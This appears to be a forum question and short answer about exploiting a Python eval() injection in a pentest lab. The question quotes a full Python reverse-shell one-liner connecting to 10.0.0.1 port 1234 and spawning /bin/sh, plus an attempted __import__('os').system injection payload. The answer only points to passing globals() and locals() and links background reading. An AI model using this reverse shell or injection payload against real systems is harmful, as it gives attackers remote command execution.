I am working on a pentest lab. There is a Python eval() function I need to exploit.
It is like
eval('%s>1',payload)
I need to execute a Python reverse shell script as payload. It is
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I am trying like
eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")
Not sure how to import all those modules and execute it.
Any help appreciated.
Try to include
globals()
andlocals()
in theeval
(to import into the global scope). This is explained in In Python, why doesn't an import in an exec in a function work?Also see https://lucumr.pocoo.org/2011/2/1/exec-in-python/ chapter Behind the Scenes of Imports